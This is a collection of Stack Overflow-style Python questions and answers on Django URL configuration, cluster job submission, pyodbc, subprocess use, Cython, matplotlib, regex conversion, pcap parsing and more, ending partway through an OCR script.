ERROR: test_form_page_loads (myapp.tests.tests.ViewTests)
----------------------------------------------------------------------
Traceback (most recent call last):
File "/home/yiqing/repos/dotfiles/common/virtualenvwrapper_hooks/filer_demo/local/lib/python2.7/site-packages/sampling/tests/tests.py", line 47, in test_form_page_loads
response = self.client.get(self.form_url)
File "/home/yiqing/repos/dotfiles/common/virtualenvwrapper_hooks/filer_demo/local/lib/python2.7/site-packages/django/test/client.py", line 453, in get
response = super(Client, self).get(path, data=data, **extra)
File "/home/yiqing/repos/dotfiles/common/virtualenvwrapper_hooks/filer_demo/local/lib/python2.7/site-packages/django/test/client.py", line 271, in get
parsed = urlparse(path)
File "/usr/lib/python2.7/urlparse.py", line 135, in urlparse
tuple = urlsplit(url, scheme, allow_fragments)
File "/usr/lib/python2.7/urlparse.py", line 168, in urlsplit
cached = _parse_cache.get(key, None)
File "/home/yiqing/repos/dotfiles/common/virtualenvwrapper_hooks/filer_demo/local/lib/python2.7/site-packages/django/utils/functional.py", line 156, in __hash__
return hash(self.__cast())
File "/home/yiqing/repos/dotfiles/common/virtualenvwrapper_hooks/filer_demo/local/lib/python2.7/site-packages/django/utils/functional.py", line 139, in __cast
return self.__bytes_cast()
File "/home/yiqing/repos/dotfiles/common/virtualenvwrapper_hooks/filer_demo/local/lib/python2.7/site-packages/django/utils/functional.py", line 135, in __bytes_cast
return bytes(func(*self.__args, **self.__kw))
File "/home/yiqing/repos/dotfiles/common/virtualenvwrapper_hooks/filer_demo/local/lib/python2.7/site-packages/django/core/urlresolvers.py", line 496, in reverse
return iri_to_uri(resolver._reverse_with_prefix(view, prefix, *args, **kwargs))
File "/home/yiqing/repos/dotfiles/common/virtualenvwrapper_hooks/filer_demo/local/lib/python2.7/site-packages/django/core/urlresolvers.py", line 382, in _reverse_with_prefix
possibilities = self.reverse_dict.getlist(lookup_view)
File "/home/yiqing/repos/dotfiles/common/virtualenvwrapper_hooks/filer_demo/local/lib/python2.7/site-packages/django/core/urlresolvers.py", line 297, in reverse_dict
self._populate()
File "/home/yiqing/repos/dotfiles/common/virtualenvwrapper_hooks/filer_demo/local/lib/python2.7/site-packages/django/core/urlresolvers.py", line 263, in _populate
for pattern in reversed(self.url_patterns):
File "/home/yiqing/repos/dotfiles/common/virtualenvwrapper_hooks/filer_demo/local/lib/python2.7/site-packages/django/core/urlresolvers.py", line 347, in url_patterns
patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module)
File "/home/yiqing/repos/dotfiles/common/virtualenvwrapper_hooks/filer_demo/local/lib/python2.7/site-packages/django/core/urlresolvers.py", line 342, in urlconf_module
self._urlconf_module = import_module(self.urlconf_name)
File "/home/yiqing/repos/dotfiles/common/virtualenvwrapper_hooks/filer_demo/local/lib/python2.7/site-packages/django/utils/importlib.py", line 35, in import_module
__import__(name)
ImportError: No module named urls
Here's the directory structure of this app, in case it's relevant:
myapp/
├── admin.py
├── conf.py
├── forms.py
├── __init__.py
├── models.py
├── templates
├── tests
│ ├── __init__.py
│ ├── models.py
│ ├── settings.py
│ └── tests.py
├── urls.py
└── views.py
Answer: Turns out I needed to create a `urls.py` with root url conf-like settings
inside of `myapp/tests/`.
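For anyone hitting the same error, here is a minimal sketch of what that file can
contain; the include target and URL pattern are assumptions you would adapt to the app:
    # myapp/tests/urls.py -- a root URLconf used only when running the test suite
    from django.conf.urls import patterns, include, url
    urlpatterns = patterns('',
        url(r'^', include('myapp.urls')),
    )
Then point the tests at it, for example by setting `ROOT_URLCONF = 'myapp.tests.urls'`
in `myapp/tests/settings.py`, or by setting the `urls` attribute on the test case class.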
|
Submitting jobs using python
Question: I am trying to submit a job in a cluster in our institute using python
scripts.
compile_cmd = 'ifort -openmp ran_numbers.f90 ' + fname \
+ ' ompscmf.f90 -o scmf.o'
subprocess.Popen(compile_cmd, shell=True)
Popen('qsub launcher',shell=True)
The problem is that the system is hanging at this point. Any obvious mistakes in
the above script? All the files mentioned in the code are available in that
directory (I have cross-checked that). _qsub_ is a command used to submit
jobs to our cluster. _fname_ is the name of a file that I created in the
process.
Answer: I have a script that I used to submit multiple jobs to our cluster using qsub.
qsub typically takes job submissions in the form
qsub [qsub options] job
In my line of work, job is typically a bash (.sh) or python script (.py) that
actually calls the programs or code to be run on each node. If I wanted to
submit a job called "test_job.sh" with maximum walltime, I would do
qsub -l walltime=72:00:00 test_job.sh
This amounts to the following python code
from subprocess import call
qsub_call = "qsub -l walltime=72:00:00 %s"
call(qsub_call % "test_job.sh", shell=True)
* * *
Alternatively, what if you had a bash script that looked like
#!/bin/bash
filename="your_filename_here"
ifort -openmp ran_numbers.f90 $filename ompscmf.f90 -o scmf.o
then submitted this via `qsub job.sh`?
* * *
**Edit:** Honestly, the most optimal job queueing scheme varies from cluster
to cluster. One simple way to simplify your job submission scripts is to find
out how many CPUs are available at each node. Some of the more recent queueing
systems allow you to submit many single CPU jobs and they will submit these
together on as few nodes as possible; however, some older clusters won't do
that and submitting many individual jobs is frowned upon.
Say that each node in your cluster has 8 CPUs. You could write your script like
#!/bin/bash
    #PBS -l nodes=1:ppn=8
for ((i=0; i<8; i++))
do
./myjob.sh filename_${i} &
done
wait
What this will do is submit 8 jobs on one node at once (`&` means do in
background) and wait until all 8 jobs are finished. This may be optimal for
clusters with many CPUs per node (for example, one cluster that I used has 48
CPUs per node).
Alternatively, if submitting many single core jobs is optimal and your
submission code above isn't working, you could use python to generate bash
scripts to pass to qsub.
#!/usr/bin/env python
import os
from subprocess import call
    bash_lines = ['#!/bin/bash\n', '#PBS -l nodes=1:ppn=1\n']
bash_name = 'myjob_%i.sh'
job_call = 'ifort -openmp ran_numbers.f90 %s ompscmf.f90 -o scmf.o &\n'
qsub_call = 'qsub myjob_%i.sh'
filenames = [os.path.join(root, f) for root, _, files in os.walk(directory)
for f in files if f.endswith('.txt')]
for i, filename in enumerate(filenames):
with open(bash_name%i, 'w') as bash_file:
bash_file.writelines(bash_lines + [job_call%filename, 'wait\n'])
call(qsub_call%i, shell=True)
|
Using SELECT LAST() with pyodbc and MSACCESS sometimes returns same value
Question: I have a strange problem that I'm having trouble both duplicating and solving.
I'm using the pyodbc library in Python to access an MS Access 2007 database. The
script is basically just importing a csv file into Access plus a few other
tricks.
I am trying to first save a 'Gift Header', then get the auto-incremented id
(GiftRef) that it is saved with, and use this value to save 1 or more
associated 'Gift Details'.
Everything works exactly as it should - 90% of the time. The other 10% of the
time Access seems to get stuck and repeatedly returns the same value for
cur.execute("select last(GiftRef) from tblGiftHeader").
Once it gets stuck it returns this value for the duration of the script. It
does not happen while processing a specific entry or at any specific time in
the execution - it seems to happen completely at random.
Also I know that it is returning the wrong value - in other words the Gift
Headers **are** being saved - and are being given new, unique ID's - but for
whatever reason that value is not being returned correctly when called.
SQL = "insert into tblGiftHeader (PersonID, GiftDate, Initials, Total) VALUES "+ str(header_vals) + ""
cur.execute(SQL)
gift_ref = [s[0] for s in cur.execute("select last(GiftRef) from tblGiftHeader")][0]
cur.commit()
Any thoughts or insights would be appreciated.
Answer: In Access SQL the `LAST()` function does not _necessarily_ return the most
recently created AutoNumber value. (See [here](http://office.microsoft.com/en-
ca/access-help/first-last-functions-HP001032232.aspx) for details.)
What you want is to do a `SELECT @@IDENTITY` immediately after you commit your
INSERT, like this:
import pyodbc
cnxn = pyodbc.connect('DRIVER={Microsoft Access Driver (*.mdb, *.accdb)};DBQ=C:\\Users\\Public\\Database1.accdb;')
cursor = cnxn.cursor()
cursor.execute("INSERT INTO Clients (FirstName, LastName) VALUES (?, ?)", ['Mister', 'Gumby'])
cursor.commit()
cursor.execute("SELECT @@IDENTITY AS ID")
row = cursor.fetchone()
print row.ID
cnxn.close()
|
capture Python script output
Question: I have written a very small script and am trying to capture its output. I have
written similar code multiple times and never had an issue. Could I have some
input? I think I am making a very silly mistake.
numpy_temp = """
import numpy
import sys
a, b, c = numpy.polyfit(%s,%s, 2)
print a, b, c""" %(x, y)
fp_numpy = open("numpy_temp.py", "w")
fp_numpy.write(numpy_temp)
cmd = "/remote/Python-2.7.2/bin/python numpy_temp.py "
proc = subprocess.Popen(cmd, stdout = subprocess.PIPE,
stderr = subprocess.PIPE, shell = True)
out, err = proc.communicate()
print "out", out
Answer: You're never actually closing `fp_numpy`, so the script can be empty or
incomplete at the time you try to run it.
It isn't _guaranteed_ to be empty, but it's very _likely_. When I try this on
two different *nix computers with 7 different versions of Python, it's empty
every time… (The fact that, after your script finishes, the file gets closed,
and therefore flushed, makes the problem harder to debug.)
The best way to fix this is to use a `with` statement, so it's impossible to
forget to close the file:
with open("numpy_temp.py", "w") as fp_numpy:
fp_numpy.write(numpy_temp)
* * *
But beyond that, you've got another problem. If the generated script raises an
exception, it will print nothing to stdout, and will dump a traceback to
stderr, which you will read and ignore. It's very hard to debug problems when
you're ignoring the errors… I don't know what you're passing for `x` and `y`,
but if you're, say, passing a `numpy.array` instead of a string that evaluates
to one, you could easily get an exception and never see it. Either send stderr
to stdout, or `print "err", err` at the end.
And finally, you really shouldn't be using a command string and `shell=True`
here, because you end up with an extra level of indirection for no good
reason, which can _also_ make things harder to debug. Just do this:
cmd = ["/remote/Python-2.7.2/bin/python", "numpy_temp.py"]
proc = subprocess.Popen(cmd, stdout = subprocess.PIPE,
stderr = subprocess.PIPE)
|
Trimmed Mean with Percentage Limit in Python?
Question: I am trying to calculate the **trimmed mean**, which excludes the outliers,
of an array.
I found there is a module called
[`scipy.stats.tmean`](http://docs.scipy.org/doc/scipy/reference/generated/scipy.stats.tmean.html#scipy.stats.tmean),
but it requires the user specifies the **range by absolute value instead of
percentage values**.
In Matlab, we have [`m =
trimmean(X,percent)`](http://www.mathworks.com/help/stats/trimmean.html), that
does exactly what I want.
**Do we have the counterpart in Python?**
Answer: At least for scipy v0.14.0, there is a dedicated (but undocumented?) function
for this:
from scipy import stats
m = stats.trim_mean(X, 0.1) # Trim 10% at both ends
which used
[`stats.trimboth`](http://docs.scipy.org/doc/scipy/reference/generated/scipy.stats.trimboth.html)
inside.
|
how to change the secs to the ISO time format?
Question: How do I convert seconds to the ISO time format?
For example:
28800 sec is the offset from midnight; if successfully converted, the
output should be 08:00:00, not 8:00:00.
How could I do it in Python? Thank you.
Answer: Solution using timedelta to 'do the math'
from datetime import datetime, timedelta
# Can easily get the values for today programmatically
    # but omitted here for brevity
midnight = datetime(2013, 10, 18)
delta = timedelta(seconds=28800)
offset_time = midnight + delta
print offset_time.strftime('%H:%M:%S')
>>> 08:00:00
|
ZeroMQ: have to sleep before send
Question: I'm writing a ZeroMQ demo with a Forwarder device (with pyzmq).
Here is the code (reference: <https://learning-0mq-with-
pyzmq.readthedocs.org/en/latest/pyzmq/devices/forwarder.html>):
forwarder.py
import zmq
context = zmq.Context()
frontend = context.socket(zmq.SUB)
frontend.bind('tcp://*:5559')
frontend.setsockopt(zmq.SUBSCRIBE, '')
backend = context.socket(zmq.PUB)
backend.bind('tcp://*:5560')
zmq.device(zmq.FORWARDER, frontend, backend)
sub.py
import zmq
context = zmq.Context()
socket = context.socket(zmq.SUB)
socket.connect('tcp://localhost:5560')
socket.setsockopt(zmq.SUBSCRIBE, '')
while True:
print socket.recv()
pub.py
import zmq, time
context = zmq.Context()
socket = context.socket(zmq.PUB)
socket.connect('tcp://localhost:5559')
# time.sleep(0.01)
socket.send('9 hahah')
I run `python forwarder.py` and `python sub.py` in the terminal,
then run `python pub.py`, but the subscriber can't get the message. However, if I
sleep a little (for example 0.01s) before sending, it works.
So my question is: why do I have to `sleep` before sending? Thanks.
Answer: It's known as [Slow Joiner](http://zguide.zeromq.org/page%3aall#Getting-the-
Message-Out) syndrome. Read the
[guide](http://zguide.zeromq.org/page%3aall#Getting-the-Message-Out), there
are ways to avoid it using pub/sub
[syncing](http://zguide.zeromq.org/page%3aall#Node-Coordination).
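A minimal sketch of the coordination idea applied to this demo; the extra sync port
(5561) and the message contents are my own additions, not part of the original example:
    # pub.py -- wait for the subscriber before publishing
    import zmq
    context = zmq.Context()
    socket = context.socket(zmq.PUB)
    socket.connect('tcp://localhost:5559')
    sync = context.socket(zmq.REP)
    sync.bind('tcp://*:5561')
    sync.recv()        # block until sub.py says it is subscribed
    sync.send('go')    # the round trip also gives the PUB connection time to finish
    socket.send('9 hahah')
And on the subscriber side, right after `setsockopt(zmq.SUBSCRIBE, '')`:
    sync = context.socket(zmq.REQ)
    sync.connect('tcp://localhost:5561')
    sync.send('ready')
    sync.recv()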
|
Efficient Cython for large matrix creation/manipulation
Question: I have been trying to speed up a section of code that creates and manipulates
a very large matrix of data (approx. 15,000 x 15,000; type double). For now, I
don't think the size of the matrix is that important because I do not see
speedup even for a small 10 x 10 matrix (in fact, the compiled cython code is
slower than pure python for small matrices, whereas the time is nearly
identical between cython and python for the large matrices). Please be patient
with me, as I have only been coding python for a week (newly converted from
Matlab) and I am only a humble chemical engineer.
The goal of the code is to take a 1D array (length L) as input, for a example:
[ 16.66 16.85 16.93 16.98 17.08 17.03 17.09 16.76 16.67 16.72]
And produce a matrix (height L, width L-1) as output:
[[ 16.66 16.85 16.93 16.98 17.08 17.03 17.09 16.76 16.67]
[ 16.85 16.93 16.98 17.08 17.03 17.09 16.76 16.67 16.72]
[ 16.93 16.98 17.08 17.03 17.09 16.76 16.67 16.72 0. ]
[ 16.98 17.08 17.03 17.09 16.76 16.67 16.72 0. 0. ]
[ 17.08 17.03 17.09 16.76 16.67 16.72 0. 0. 0. ]
[ 17.03 17.09 16.76 16.67 16.72 0. 0. 0. 0. ]
[ 17.09 16.76 16.67 16.72 0. 0. 0. 0. 0. ]
[ 16.76 16.67 16.72 0. 0. 0. 0. 0. 0. ]
[ 16.67 16.72 0. 0. 0. 0. 0. 0. 0. ]
[ 16.72 0. 0. 0. 0. 0. 0. 0. 0. ]]
I hope it is clear from the example above and from the code below what I am
trying to achieve. The algorithm needs to scale to very large matrices, which
it currently does without error, it's just slow!
Here is my cython code:
from scipy.sparse import spdiags
import numpy as np
cimport numpy as np
cimport cython
@cython.boundscheck(False)
@cython.wraparound(False)
def sfmat(np.ndarray[double, ndim=1] data):
cdef int h = data.shape[0]
cdef np.ndarray[double, ndim=2] m = np.zeros([h, h-1])
m = np.flipud(spdiags(np.tril(np.tile(data,[h-1,1]).T,0),range(1-h,1), h, h-1).todense())
return m
I also tried more verbose code, which may be clearer to read:
from scipy.sparse import spdiags
import numpy as np
cimport numpy as np
cimport cython
DTYPE = np.float
ctypedef np.float_t DTYPE_t
@cython.boundscheck(False)
@cython.wraparound(False)
def sfmat(np.ndarray[DTYPE_t, ndim=1] data):
assert data.dtype == DTYPE
cdef int h = data.shape[0]
cdef np.ndarray[DTYPE_t, ndim=2] m = np.zeros([h, h-1], dtype=DTYPE)
cdef np.ndarray[DTYPE_t, ndim=2] s1 = np.zeros([h, h-1], dtype=DTYPE)
cdef np.ndarray[DTYPE_t, ndim=2] s2 = np.zeros([h, h-1], dtype=DTYPE)
cdef np.ndarray[DTYPE_t, ndim=2] s3 = np.zeros([h, h-1], dtype=DTYPE)
s1 = np.tile(data,[h-1,1]).T
s2 = np.tril(s1,0)
s3 = spdiags(s2,range(1-h,1), h, h-1).todense()
m = np.flipud(s3)
return m
Any help with the Cython implementation would be very much appreciated. If
there is any other way to speed up this algorithm, that would help too. Thank
you for any help!
Because I am new to this, here are more details, which may or may not be
preventing me from speeding this up. I am running 64 bit Windows 7 Pro, and
compiling the cython code successfuly using the Windows SDK C/C++ compiler. (I
followed the directions on github
[here](https://github.com/cython/cython/wiki/64BitCythonExtensionsOnWindows)
with success). The simple "hello world" cython examples compile fine and run
fine in 64 bit mode, and the code above also compiles and runs with no errors.
For manipulation of the entire 15,000 x 15,000 matrix, 64bit architecture is
required, or at least I believe so, because running the code after compiling
for 32bit resulted in a memory error. For this question, please assume that
breaking up the matrix into smaller chunks is not possible. Please let me know
if there is any other information required to answer this question.
Cheers, scientistR
**UPDATE**
I thought that avoiding for loops would be the best approach, however, spdiags
is the main bottleneck. Thus, a new algorithm works better (4x improvement on
my computer):
import numpy as np
cimport numpy as np
cimport cython
@cython.boundscheck(False)
@cython.wraparound(False)
def sfmat(np.ndarray[double, ndim=1] data):
cdef int i
cdef np.ndarray[double, ndim=2] m = np.zeros([data.shape[0], data.shape[0]-1])
for i in range(data.shape[0]-1):
m[:,i] = np.roll(data,-i);
return m
But Cython does not offer any improvement over pure Python. Please help. As
the commentators have pointed out, there may not be a way to improve this,
besides a more optimized algorithm, but I am hopeful. Thanks! Also, is there a
faster algorithm, cython or python?
Answer: This might be a bit of an old question, but no question should be left
unanswered `:)`. I was able to speed up your Cython code by about 8x by using
straightforward for-loops (which are actually fast in Cython), for array size
of 7000. Note, by the way, that your implementation using `np.roll` does not
produce the array that you want (!), but I used that function to compare
timings with.
_Edited code to use Typed Memoryviews and`np.empty` instead of `np.zeros`_
def sfmat(double[:] data):
cdef int n = data.shape[0]
cdef np.ndarray[double, ndim=2] out = np.empty((n, n-1))
cdef double [:, :] out_v = out # "typed memoryview"
cdef int i, j
for i in range(n-1):
out_v[0, i] = data[i]
for i in range(1, n):
for j in range(n-i):
out_v[i, j] = data[i+j]
for j in range(n-i, n-1):
out_v[i, j] = 0.
return out
Unfortunately, the Cython effort is only ~1.2x faster than running the
following code in a regular Python session:
def sfmat(data):
n = len(data)
out = np.empty((n, n-1))
out[0, :] = data[:n-1]
for i in xrange(1, n):
out[i, :n-i] = data[i:]
out[i, n-i:] = 0
return out
However as already discussed in the comments, blowing up your original fairly
small matrix in this way is probably not the most efficient way to tackle your
actual, overall problem anyway. If all you wanted to do initially was avoid
using for-loops, in Cython there's simply no need to do that!
|
Django - No module name site.urls
Question: As [this other SO post
shows](http://stackoverflow.com/questions/11216829/django-directory-
structure), my Django 1.4 directory structure globally looks like:
wsgi/
champis/
settings.py
settings_deployment.py
urls.py
site/
static/
css/
app.css
templates/some_app/foo.html
__init__.py
urls.py
views.py
models.py
manage.py
The project is `champis`, the app is `site`. My _PYTHONPATH_ includes the
`wsgi` folder (well from Django standards it should be named after the project
i.e. `champis`, but here I'm starting from an
[Openshift](https://www.openshift.com/) [django-example Git
project](https://github.com/openshift/django-example)).
My `champis.urls`:
from django.conf.urls import patterns, include, url
# Uncomment the next two lines to enable the admin:
# from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
url(r'^champis/', include('site.urls')),
url(r'^admin/', include(admin.site.urls)),
)
My `site.urls` module then routes to specific pages, but when trying to access
on local, I have the error:
http://127.0.0.1/champis => no module name site.urls
The `site` app is present in my `INSTALLED_APPS`, and my `ROOT_URLCONF` is
`champis.urls`. Do you have an idea why? Even moving the `site` folder into
the `champis` one didn't help.
Answer: I finally managed to solve this problem by:
* adding an `__init__.py` at project level
* renaming my `site` app into `web` (app name seemed to be colliding with... something that I did not find)
Here is my current directory structure now:
wsgi/
champis/
settings.py
settings_deployment.py
urls.py
web/ <= changed app name
static/
css/
app.css
templates/some_app/foo.html
__init__.py
urls.py
views.py
models.py
manage.py
__init__.py <= added
|
Plot figure problems with python and matplotlib
Question: I'm making an app that plots a figure after some processing. This is done
after the user has introduced some values and pushed a button. However, I don't
get the figure plotted. Below is simplified code. It works fine if I plot
the values of t and s directly, but not if it is done after pushing the button.
What am I missing? Is there a better way to do this?
from numpy import arange, sin, pi
import matplotlib
matplotlib.use('WXAgg')
from matplotlib.backends.backend_wxagg import FigureCanvasWxAgg as FigureCanvas
from matplotlib.backends.backend_wx import NavigationToolbar2Wx
from matplotlib.figure import Figure
import wx
class Input_Panel(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self, parent)
# Input variables
self.button = wx.Button(self, label="Go")
# Set sizer for the panel content
self.sizer = wx.GridBagSizer(1, 1)
self.sizer.Add(self.button, (1, 2), (3, 6), flag=wx.EXPAND)
self.SetSizer(self.sizer)
class Output_Panel_Var(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self, parent)
# Output variables
self.tittle = wx.StaticText(self, label="OUTPUTS:")
self.font = wx.Font(12, wx.DECORATIVE, wx.BOLD, wx.NORMAL)
self.tittle.SetFont(self.font)
self.lblt = wx.StaticText(self, label="t:")
self.resultt = wx.StaticText(self, label="", size=(100, -1))
self.lbls = wx.StaticText(self, label="s:")
self.results = wx.StaticText(self, label="", size=(100, -1))
# Set sizer for the panel content
self.sizer = wx.GridBagSizer(2, 2)
self.sizer.Add(self.tittle, (1, 3))
self.sizer.Add(self.lblt, (3, 1))
self.sizer.Add(self.resultt, (3, 2))
self.sizer.Add(self.lbls, (4, 1))
self.sizer.Add(self.results, (4, 2))
self.SetSizer(self.sizer)
class Output_Panel_Fig(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self, parent)
self.figure = Figure()
self.axes = self.figure.add_subplot(111)
self.canvas = FigureCanvas(self, -1, self.figure)
self.sizer = wx.BoxSizer(wx.VERTICAL)
self.sizer.Add(self.canvas, 1, wx.LEFT | wx.TOP | wx.GROW)
self.SetSizer(self.sizer)
def draw(self,t,s):
self.axes.plot(t, s)
class Main_Window(wx.Frame):
def __init__(self, parent, title):
wx.Frame.__init__(self, parent, title = title, pos = (0, 0), size = wx.DisplaySize())
# Set variable panels
self.main_splitter = wx.SplitterWindow(self)
self.out_splitter = wx.SplitterWindow(self.main_splitter)
self.inputpanel = Input_Panel(self.main_splitter)
self.inputpanel.SetBackgroundColour('#c4c4ff')
self.outputpanelvar = Output_Panel_Var(self.out_splitter)
self.outputpanelvar.SetBackgroundColour('#c2f1f5')
self.outputpanelfig = Output_Panel_Fig(self.out_splitter)
self.main_splitter.SplitVertically(self.inputpanel, self.out_splitter)
self.out_splitter.SplitHorizontally(self.outputpanelvar, self.outputpanelfig)
# Set event handlers
self.inputpanel.button.Bind(wx.EVT_BUTTON, self.OnButton)
def OnButton(self, e):
t = arange(0.0, 1.0, 0.01)
s = sin(2 * pi * t)
#self.outputpanelvar.resultt.SetLabel('%.5f' % t)
#self.outputpanelvar.resultt.SetLabel('%.5f' % s)
self.outputpanelfig.draw(t,s)
def main():
app = wx.App(False)
frame = Main_Window(None, "T-Matrix Codes GUI")
frame.Show()
app.MainLoop()
if __name__ == "__main__" :
main()
Answer: I think you are missing a redraw of the canvas. It is not enough to do a new
plot; the drawing pane must also be refreshed. Add a self.canvas.draw()
after your plot command in the draw method of Output_Panel_Fig; this should
help.
import ...
class Input_Panel(wx.Panel):
def __init__(self, parent):
...
class Output_Panel_Var(wx.Panel):
def __init__(self, parent):
...
class Output_Panel_Fig(wx.Panel):
def __init__(self, parent):
...
def draw(self,t,s):
self.axes.plot(t, s)
self.canvas.draw()
class Main_Window(wx.Frame):
def __init__(self, parent, title):
...
def OnButton(self, e):
...
def main():
...
if __name__ == "__main__" :
main()
|
Python regex and using s/ in pattern
Question: I have this regex pattern that when I use in vim works great:
s/\.[A-Za-z0-9_]*\(IPROC\|IFIX\|IPTAT\)[A-Za-z_]*\([0-9][0-9]*\)[^0-9]*.*([A-Za-z0-9_]*\(IPROC\|IFIX\|IPTAT\)[A-Za-z_]*\([0-9][0-9]*\)[^0-9]*.*)/\3_\4
I am searching for things like
`.jalsdkjflkajsdf_lajsdlfIFIX_100(IFIX_asdf_200)`
It will return: `IFIX_200` (the last part). I can also set it to return
buffers 1 and 2 so I can get `IFIX_100` (the first part).
How can I use this regex in Python to return what is expected? I've
tried both re.findall and re.search, with no luck.
patternI1 = 's/\.[A-Za-z0-9_]*\(IPROC|IFIX|IPTAT\)[A-Za-z_]*\([0-9][0-9]*\)[^0-9]*.*([A-Za-z0-9_]*\(IPROC|IFIX|IPTAT\)[A-Za-z_]*\([0-9][0-9]*\)[^0-9]*.*)/\3_\4'
with open(filename) as input_file:
for num, line in enumerate(input_file, 1):
if re.search(patternI1, line):
x = re.findall(patternI1, line)
print x
Answer: Leave off the `s/ ... /\3_\4`; that's Vim search-and-replace syntax. Vim also
uses metacharacters differently: in Python, do _not_ escape the `(..)` parentheses of a
group, but _do_ escape literal `()` parentheses.
`\w` is a nice shortcut for `[A-Za-z0-9_]`, and `\d` will do for `[0-9]`, `\D`
for `[^0-9]`, using `\d+` where `\d\d*` was used:
patternI1 = r'\.\w*(IPROC|IFIX|IPTAT)\w*?(\d+)\D*.*\(\w*(IPROC|IFIX|IPTAT)\w*?(\d+)\D*.*\)'
I've adjusted the greedyness of the `\w*` pattern before the digits groups to
prevent these from swallowing too many digits too. Demo:
>>> import re
>>> sample = '.jalsdkjflkajsdf_lajsdlfIFIX_100(IFIX_asdf_200)'
>>> patternI1 = r'\.\w*(IPROC|IFIX|IPTAT)\w*?(\d\d*)\D*.*\(\w*(IPROC|IFIX|IPTAT)\w*?(\d\d*)\D*.*\)'
>>> re.search(patternI1, sample).groups()
('IFIX', '100', 'IFIX', '200')
|
How do I combine two files without overwriting any data in python?
Question: I need to concatenate two files, one which contains a single number and the
other which contains at least two rows of data. I have tried
shutil.copyfile(file2,file1) and subprocess.call("cat " + file2 + " >> " +
file1, shell=True), both things give me the same result. The file with the
single number contains an integer and a newline (i.e. two characters) so when
I bring the two files together the first two characters of file2 are
overwritten instead of just added to the end. If I do it through the shell
using "cat file2 >> file1" this does not happen and it works perfectly.
Here is what I mean:
import numpy as np
from subprocess import call
    f = open(file1, 'w')
f.write('2\n')
np.savetxt(file2,datafile,fmt)
call("cat " + file2 " >> " + file1, shell=True)
So instead of getting:
2
data data data ...
data data data ...
I get:
2
ta data data ...
data data data ...
I have no idea what is causing this issue but it is very frustrating. Any
suggestions?
Answer: Have you tried closing `file1` first?
    f.write('2\n')
    f.close()  # flush the buffered '2\n' before the cat appends to file1
    np.savetxt(file2, datafile, fmt)
    call("cat " + file2 + " >> " + file1, shell=True)
|
How to parse Ethernet Header of pcap file using Python?
Question: I would like to decode the link-layer type and version of packets in a pcap
file using Python. So, I have to parse pcap using Python. Here is my code.
import dpkt
import socket
import sys
f = open('filename')
pcap = dpkt.pcap.Reader(f)
for ts, buf in pcap:
eth = dpkt.ethernet.Ethernet(buf)
ip = eth.data
tcp = ip.data
print ts, len(buf)
print eth
print ip
print tcp
f.close()
Answer: The [dpkt](https://code.google.com/p/dpkt/) Python library is maybe not the
best tool for this task; according to their website, dpkt is best used for:
> fast, simple packet creation / parsing, with definitions for the basic
> TCP/IP protocols.
Instead, use scapy, which is a
> powerful interactive packet manipulation program for Python.
You can use a script like this
from scapy.all import *
packets = rdpcap('tmp.pcap')
for p in packets:
(p/Ether()).show()
Read [Infinite possibilities with Python's Scapy
Module](http://bt3gl.github.io/infinite-possibilities-with-pythons-scapy-
module.html) for more details.
|
Sending Strings Queue to Clipboard in python
Question: I am writing a program that runs in the background and checks for file changes
in a folder. If any new image file arrives in that folder, it reads the text from
that image with the help of the tesseract OCR engine. The images contain addresses
of employees, and the Python program splits each address into individual sections.
I want to put each address section into the clipboard one after another, so if I
press Ctrl+V the first section will be pasted, and the next time I press Ctrl+V the
next section will be pasted, and so on.
Here is the code.
#!/usr/bin/python
import commands,os
global vdir,outfile
global prev
vdir="Vilvin"
out="Output"
a=os.listdir(vdir)
prev=len(a)
whcount=0
stat_dict={'NEW HRMPSHIRE': 'NEW HAMPSHIRE', 'VERMONT': 'VERMONT', 'LOUISIRNR': 'LOUISIANA', 'CRLIFORNIR': 'CALIFORNIA', 'MISSISSIPPI': 'MISSISSIPPI', 'PENNSYLVRNIR': 'PENNSYLVANIA', 'MONTRNR': 'MONTANA', 'GEORGIR': 'GEORGIA', 'WRSHINGTON': 'WASHINGTON', 'NEW YORK': 'NEW YORK', 'MRRYLRND': 'MARYLAND', 'IOWR': 'IOWA', 'SOUTH DRKOTR': 'SOUTH DAKOTA', 'VIRGINIR': 'VIRGINIA', 'FLORIDR': 'FLORIDA', 'MRINE': 'MAINE', 'NEBRRSKR': 'NEBRASKA', 'RLRSKR': 'ALASKA', 'ILLINOIS': 'ILLINOIS', 'CONNECTICUT': 'CONNECTICUT', 'TENNESSEE': 'TENNESSEE', 'NEW MEXICO': 'NEW MEXICO', 'COLORRDO': 'COLORADO', 'DELRWRRE': 'DELAWARE', 'HRWRII': 'HAWAII', 'NORTH CRROLINR': 'NORTH CAROLINA', 'UTRH': 'UTAH', 'RLRBRMR': 'ALABAMA', 'MICHIGRN': 'MICHIGAN', 'RRKRNSRS': 'ARKANSAS', 'NEW JERSEY': 'NEW JERSEY', 'MISSOURI': 'MISSOURI', 'OREGON': 'OREGON', 'WYOMING': 'WYOMING', 'OHIO': 'OHIO', 'WISCONSIN': 'WISCONSIN', 'MINNESOTR': 'MINNESOTA', 'KRNSRS': 'KANSAS', 'RHODE ISLRND': 'RHODE ISLAND', 'WEST VIRGINIR': 'WEST VIRGINIA', 'IDRHO': 'IDAHO', 'OKLRHOMR': 'OKLAHOMA', 'KENTUCKY': 'KENTUCKY', 'RRIZONR': 'ARIZONA', 'NEVRDR': 'NEVADA', 'INDIRNR': 'INDIANA', 'MRSSRCHUSETTS': 'MASSACHUSETTS', 'SOUTH CRROLINR': 'SOUTH CAROLINA', 'NORTH DRKOTR': 'NORTH DAKOTA', 'TEXRS': 'TEXAS'}
while True:
instant=os.listdir(vdir)
if(len(instant)>prev):
print "File Change Detected...."
r=commands.getoutput('ls -ct1 '+vdir+' | head -1')
print "Most recent file = %s " %(r)
r=r.replace("(","\(")
r=r.replace(")","\)")
r=r.replace(" ","\ ")
os.system("tesseract "+vdir+"/"+r+" "+out+"/"+"Output")
result=commands.getoutput("awk -F: '{ print $2 $3 }' "+out+"/"+"Output.txt")
res=result.split("\n")
state=res[0].split("State")
profile=res[1].split("Pro?ile")
applicant=state[0].strip().replace("R","A")
state=state[1].strip()
state=stat_dict[state]
sid=profile[0].strip()
profile=profile[1].strip().replace("R","A")
sec=res[3].strip().replace("R","A")
